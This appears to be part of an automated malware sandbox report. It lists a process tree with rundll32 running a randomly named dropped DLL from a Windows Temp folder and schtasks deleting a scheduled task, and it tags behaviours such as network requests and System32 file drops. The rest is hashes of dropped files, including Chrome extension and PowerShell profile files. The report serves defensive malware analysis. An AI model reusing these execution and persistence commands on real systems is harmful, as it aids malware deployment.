\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\XwIFwyvoUqntekhn\ITILWLsf\MqbbdEy.dll",#1 /UdidX 3851371⤵PID:2788
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\XwIFwyvoUqntekhn\ITILWLsf\MqbbdEy.dll",#1 /UdidX 3851372⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vczjtXgpVbXDKOBgh"3⤵PID:1092
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
2KB
MD5aed5ca7f5454bfb793146f6878142f30
SHA178b805eaae7581333238fda6a52a039764c60f12
SHA25624cd8cf9e95f3f3bc5d8a4b6dc9e4d6853b55568feb7168446f68461b5686314
SHA51256ce536ca5a65518e07f79bc40b7a1e1b4541e94dcc6268db367be47f59f21a7774514e1778433d15ce8995f5e4a9ce3cc1508adb2515cfadc12d54692f95e5d
-
Filesize
2KB
MD5d1b0ddb1942328107ccc33381249518d
SHA1e87097b38d132dda6aa5258114347c3349fd106e
SHA256c81c6b4cd2b9525856bbc841196a50e60f1589167665c628132245162aa1a014
SHA512b534370cf42cb93b112f3068fc33faf3a26be4adc4cb50976c91708715cfdde4fcfe84d2784a884420a37bc65fcfc07cdf36c9d4d0c881125df66bbf7365d258
-
Filesize
2KB
MD5c317ab806d96ccfb5557bc2e01283311
SHA1031f5d67c418f073269ff26af974017c79cde4de
SHA2569784cb426630915bced95bbc1f6f67898fd7445eb189543679c0862c76f4df42
SHA512e71bc83726169f30ad27c45fdc5b172f7063fb7911e1dba6d82f8317ba1681565c098cc2bb7c7ca7bc66fb2ad546525b1806fbe97804db70388710bb31dd9503
-
Filesize
2KB
MD534c840a15b81608a7a8fb829d8f9e53e
SHA19202d15e5bf093655936c8ca30ad1fc625614cdc
SHA2565f9bfd897c9f860804e89085280f50fe2d9eb7f1323c76303d5aae94362ae955
SHA5125aca6c57bcb945d4ac2a148859d77ed842ed48ffc8ec19c0384f20c27da299f9c76e0147c2cdf8937a062072b5a5b6eb8cfcd7a85ed9a2c18b691ae372f2676f
-
Filesize
2.5MB
MD55f137ffad9e130e916378a9e9cbb4e35
SHA12072bb32726806ef70e32ee4fffd9a7fbc812f96
SHA256e30c3a3ed1d4925e321e5871acc6a06f77549fdf83f40f339d6927edc06c50a4
SHA512fff3782c3cbea81f857fd871653f90a04de670d5625d5470433f08f611111b0b9448b5808a45f3baa8e30877a50255096c29a5ac40b23f0409830b22593fff44
-
Filesize
2KB
MD534fb5085ffda63c49970b74e75274e52
SHA1c905564a9037666de1719851ee37733d7689b3f8
SHA2569d33e7185a54bb3decf6e23235a132c94c2c51d81e14cda2f2e3403f66421cb9
SHA5121358e75011519a371bca89e2ccaf9a257772723682ee51f1f18f01eff8a0f1f31d1ec59389cd034c1e717484c001e3fbc282d6624b9705f43d419d3547d714a2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD581ddeb85f14f05b02ad0709f3ce16b77
SHA141a825058d5df2886ca2adb2478d7514e17d5d82
SHA256001119802521d82d3eda4d196a0fde66b7b1a972f7bffe7ec27aba0850a08315
SHA512fd4526847a64b0b3ba171221feecb6bc822b64a38c3170986b8af561f0aca88a71cb4d565dbc67d41d13c46fde35a65783f24fc31fd4e9f9666fcd8c00489f2d
-
Filesize
36KB
MD5487d434f83196f3aacef86c3619616cc
SHA19b0b49b0e0649bbbc40876769c8aae5c0fb67afe
SHA2567a6e4909d380bb36d66f91ad1725a47d1f512cfa51745f4d1fda98211a3dbe55
SHA512e0812de9517fd49036f1aaa6b4e8f2643f28c09fa017733fce175a00d81611b689c0f61c1441b560cd6636077063010fd3adf1dab1fa9cb0675ade22400df455
-
Filesize
12KB
MD52dea6e3eee85e87426a9b354cf2b358a
SHA139e93017fc9482260fd9a468e7dfe6204718ac0a
SHA2568e66b23a1c1b5d452a2dbc97182ea7d820a9bc776309159cbaf8d06cda136cbe
SHA5126b0c886874058c942ea44648a141e00dc4e86a1bef9425c8e3d941c32a77ec643cb0b80f4b94e767925ac28c11d0b5adfab5192e68abe8fcc25c3974fb9d0ee7
-
Filesize
6.4MB
MD5dbefbc71c64bddd4e1c16a51137a9c4b
SHA101f8007bbb4795adf72b1082cf5db7e9070ba412
SHA25637eae6dbe7087b544cfd89ba476bf0e18b884608b18b9ba94d0dbadea2c4a543
SHA512e29b01ba923cf515893f7f311b3191f1758931609a72b0cd93e0ceb815539aabacc92024eaf35c6c9ce2384317701cf1f222e8cfd8a712ce3b1c90ea3cb8c7bf
-
Filesize
6.7MB
MD57d81480dc33ed5603a660ab787ba942b
SHA104e0360d151b0c30778f3f747d43bd80785310a3
SHA256a63e0ec7bf6eee3581885b2d8e0a4b9fc33922c734591704925f15ffc2f257c4
SHA512834cfae4be9f95429ce40ef492a6089766c0e8b39748a8ef905d25785693947a4aaa1dd6c18a3d0698b278f7aef5159955b86e091f8cff8b95883679ad303bbf
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
6KB
MD555b654f4d676728ccc4051d0d25a1896
SHA1c0757e6af06781f3c53c4bf1c2b57534b820228b
SHA25654ae34b37a2643b03aff9fc00b833369cf404dbd2834190189e37b2a58847c9e
SHA5128a49ab2096c9171dab97c26c9135d80d178f8523b763399f8814d99eac27bbd82a6dd6780a965de735f60eea403c3c5ac7e8ee9779322079d00e1a2428c0b924
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD5e33ed3d4cc9b2e5a08ae25747ef47620
SHA1e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7
SHA2560e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f
SHA5129e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5ad81c48f924ed3bc28dce01320e606b6
SHA18b531653bbc27dc8b4340ddcc4114a3ddae4c1da
SHA256523518c2049aa180df8463b6dc210d3c9a9956039338faac1b82589e1f728a01
SHA51234e3230aae2f71959987134163787ef58520c340969872a53794cf388a4096cf220c99271a63a3a07b523e4889ff1f3e87cf083d04ac5065cf1c7c68078f52ca
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD52775234ea92d513b3fdc0b42812dba39
SHA13718e9b9e90bf9d43caa1fe8a3db93db822039bc
SHA2560618b88e320ef4aa29b1c25c917e417daa1a3a3a0bd2b39bdd9a36e3024694a0
SHA512592d8783c44dbc590a8ac855d3e5b53ff08034ea2f064481f5b991f76539909adb9ca86f62e051e19c2db7dadc9e333ed864e5d60172148aca62311dbf45fa00
-
Filesize
6.4MB
MD5d9a4c2736e6e08c43cf77d61d5b8f87c
SHA1e2fa6783deb4f4bd3c4b758ba7c0f419abfab430
SHA2566e6f7797071baa57831bb69a84f82950630c1bc252238b6e8b879cb6a02a1bf4
SHA512df4b4687a09c4065ed13931d069bf0e7b514b8812e1c7669f1813339118014a51a0f7dd0068e923c5edcfe8e175cda04c496cb34d5648d8dc577ebff49f526b0
-
Filesize
6KB
MD5bdd360aa1f99d6845e74a2949420764e
SHA1c6ea07c26d20b42d31ed1da138b23d0d99bea2f4
SHA25639ca342a3ce556b75155117f3c0266c51a436300bb9cb276963e8212f09fc375
SHA5123fe0a35357ba7d8cbae057fab620b185d66bc06ed3e6a862655a93cf1006267feae9b82cb88f0c55ea11f8148be59eeb2cf9dd808972b1d0ddf518d3fcb4a462